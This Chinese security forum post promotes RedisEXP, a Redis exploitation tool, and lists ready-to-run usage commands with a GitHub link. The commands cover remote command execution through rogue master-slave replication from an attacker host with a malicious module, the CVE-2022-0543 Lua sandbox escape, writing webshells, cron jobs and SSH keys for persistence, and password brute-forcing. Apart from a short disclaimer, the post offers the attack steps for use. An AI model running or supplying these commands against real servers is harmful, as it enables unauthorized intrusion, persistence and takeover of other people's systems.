安全矩阵

 找回密码
 立即注册
搜索
查看: 711|回复: 0

Redis 漏洞利用工具 -- RedisEXP

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2023-2-8 14:53:51 | 显示全部楼层 |阅读模式
Redis 漏洞利用工具 -- RedisEXP
yuyan-sec  Web安全工具库
2023-02-06 08:00 发表于河南
===================================
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,
均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

Redis 漏洞利用工具。

0x02 安装与使用

常用命令:
  1. 主从复制命令执行:
  2. RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec
  3. RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console

  4. Linux:
  5. RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -so exp.so
  6. RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console -so exp.so

  7. 主从复制文件上传:
  8. RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -rfile dump.rdb -lfile dump.rdb -upload

  9. 主动关闭主从复制:
  10. RedisExp.exe -rhost 192.168.211.131 -slaveof

  11. Lua沙盒绕过命令执行 CVE-2022-0543:
  12. RedisExp.exe -rhost 192.168.211.131 -lua -console

  13. 备份写 Webshell:
  14. RedisExp.exe -rhost 192.168.211.131 -shell

  15. Linux 写计划任务:
  16. RedisExp.exe -rhost 192.168.211.131 -crontab

  17. Linux 写 SSH 公钥:
  18. RedisExp.exe -rhost 192.168.211.131 -ssh

  19. 爆破 Redis 密码:
  20. RedisExp.exe -rhost 192.168.211.131 -brute -pwdf ../pass.txt

  21. 执行 Redis 命令:
  22. RedisExp.exe -rhost 192.168.211.131 -cli
复制代码


0x03 项目链接下载

项目地址:https://github.com/yuyan-sec/RedisEXP



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 22:49 , Processed in 0.015170 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表